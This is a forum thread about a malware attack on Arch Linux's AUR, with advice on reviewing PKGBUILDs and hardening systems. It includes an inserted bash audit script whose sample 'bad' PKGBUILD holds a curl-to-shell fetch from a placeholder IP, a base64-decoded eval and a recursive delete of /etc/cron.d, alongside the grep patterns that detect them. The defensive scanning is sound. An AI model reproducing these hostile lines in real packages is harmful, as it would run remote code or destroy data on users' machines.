• bitfucker@programming.dev · 5 up · 50 minutes ago

    Honestly I take no issue with the malware attack. I find it more offensive that many publications write it like it’s the end of Arch. Like bro, AUR is NOT what I’d recommend to beginners to get their packages from. Some of the obscure packages include browser extensions. Like, why would you install an extension from the AUR instead of the browser extension marketplace? This is why easy and braindead AUR helpers need to die. It encourages bad practice.

  • Meshuggah333@piefed.world · 16 up / 1 down · edited · 36 minutes ago

    The question here is why the f’ didn’t they shut down the AUR package takeover procedure? It makes no sense facing an attack of such a large scale.

  • UnfortunateShort@lemmy.world · 18 up · 5 hours ago

    What is even the goal here? It’s just such a weirdly specific target. You could easily hit more people by supply chain attacks. Feels like some butthurt hacker wants to get their revenge on just Arch in general. I want to start a Manjaro-Takeover conspiracy theory rn

    • darcmage@lemmy.dbzer0.com · 21 up · edited · 4 hours ago

      It seems like a continuation from the DDoS attacks that still happen from time to time. If I were going down the conspiracy rabbit hole, I’d think some group is trying to keep Linux in the press with bad/scary news to drive away growing interest, and Arch seems like the easiest target atm.

  • shweddy@lemmy.world · 9 up · 4 hours ago

    As a new Arch user, how do I check PKGBUILD and install script changes? And what am I looking for that is out of the ordinary?

    Feel free to point me to a wiki page if possible

    Never mind, I just searched PKGBUILD.

    • jrgd@lemmy.zip · 6 up · 3 hours ago

      Using the AUR largely expects users to understand the basics of shell/Bash scripts, which is what a PKGBUILD is. The most obvious thing to check is what URL(s) the PKGBUILD is pulling in for a package’s source(s). Are these URLs sourced from official or otherwise trusted sources for the application or component (such as the app author’s download site or their git forge)? Does the PKGBUILD make any claims about what is being downloaded, and do the target URL’s contents match that? If either of these checks fails, it’s best to avoid that package.

      Additionally, does the PKGBUILD attempt to do things like obfuscate data such as URLs or tokens for downloading? Does it attempt to recklessly delete or modify files/directories (rm -rf, other recursive functions)? Does the PKGBUILD make use of any arbitrary execution statements such as exec or spawning subshells? If any of these checks is true, the package should seriously be revised before attempting to install it. System-level software installs on Linux systems should never be complicated enough to need fancy execution techniques nor reckless file management.
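      The checks above, turned into a small review script as an added example (not an Arch or AUR tool, and not the commenter’s own code): it lists every source URL for comparison with upstream, then flags the patterns named in the comment. The two PKGBUILD fixtures, the 203.0.113.x addresses and the sha256 value are constructed placeholders.

```bash
#!/usr/bin/env bash
# Heuristic PKGBUILD red-flag scan (added example, not an Arch/AUR tool).
# Lists every source URL for comparison with upstream, then prints one
# "FLAG:" line per suspicious pattern; return status = number of flags.
# No flags is not a clean bill: it only means these patterns are absent.
audit_pkgbuild() {
    local f="$1" n=0
    flag() { echo "FLAG: $1"; n=$((n + 1)); }

    echo "source URLs (check them against the project's own site or git forge):"
    grep -oE "https?://[^[:space:])\"']+" "$f" | sort -u | sed 's/^/  /'
    # Plain-http downloads can be swapped in transit.
    grep -q 'http://' "$f" && flag "non-TLS source URL"
    # 'SKIP' checksums mean a tarball is never verified (normal only for git sources).
    grep -qE "sums=\(.*'SKIP'" "$f" && flag "checksum verification skipped"
    # Decoding blobs or eval at build time is the classic way to hide a payload.
    grep -qE 'base64 (-d|--decode)|xxd -r|(^|[^a-zA-Z_])eval[[:space:]]' "$f" && flag "decoded/obfuscated content"
    # Fetching and running code at build time instead of declaring it in source=().
    grep -qE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$f" && flag "download piped into a shell"
    # Packaging never needs exec or 'sh -c'.
    grep -qE '(^|[[:space:];&|(])exec[[:space:]]|(ba)?sh -c' "$f" && flag "exec / sh -c usage"
    # Recursive deletion that is not confined to $srcdir or $pkgdir.
    grep -E 'rm[[:space:]]+-[a-zA-Z]*r' "$f" | grep -vqE '\$\{?(pkgdir|srcdir)' && flag "recursive rm outside srcdir/pkgdir"
    return "$n"
}

# Constructed fixtures: an ordinary upstream-style PKGBUILD and a suspicious one
# (203.0.113.0/24 is a documentation range; the sha256 is a placeholder value).
write_samples() {
    cat > "$1/clean" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
source=("https://example.org/releases/$pkgname-$pkgver.tar.gz")
sha256sums=('2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae')
package() { cd "$srcdir/$pkgname-$pkgver"; rm -rf "$pkgdir/usr/share/doc"; make DESTDIR="$pkgdir" install; }
EOF
    cat > "$1/bad" <<'EOF'
pkgname=example-tool
source=("http://203.0.113.10/files/tool.tar.gz")
sha256sums=('SKIP')
prepare() { eval "$(echo "$blob" | base64 -d)"; curl -s http://203.0.113.10/i | sh; }
package() { rm -rf /etc/cron.d; exec /usr/bin/env true; }
EOF
}

# Usage: ./audit.sh /path/to/PKGBUILD   (exit status = number of flags)
[ "$#" -eq 1 ] && audit_pkgbuild "$1"
```

      A zero exit status only says these particular patterns were not found; the URL list still has to be compared against the upstream project by hand.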

      • shweddy@lemmy.world · 1 up · 10 minutes ago

        Thank you, I wasn’t expecting such a deep answer. The wiki was kinda confusing cuz it’s dry.

    • wise123@sh.itjust.works · 8 up · 4 hours ago

      If you are concerned with security, you can install Portmaster or any other firewall, force-block all internet connections and deny all the connections, and then manually start allowing apps and processes access to the internet.

      It’s an annoying process. It takes a lot of time to set up, but once it gets going, you will be mostly secure from this type of attack.

      So, sort of security over convenience.

      • massive_bereavement@fedia.io · 4 up / 1 down · 3 hours ago

        I would add using Flatpak as much as possible, and only using the AUR in special circumstances, also using SELinux if possible.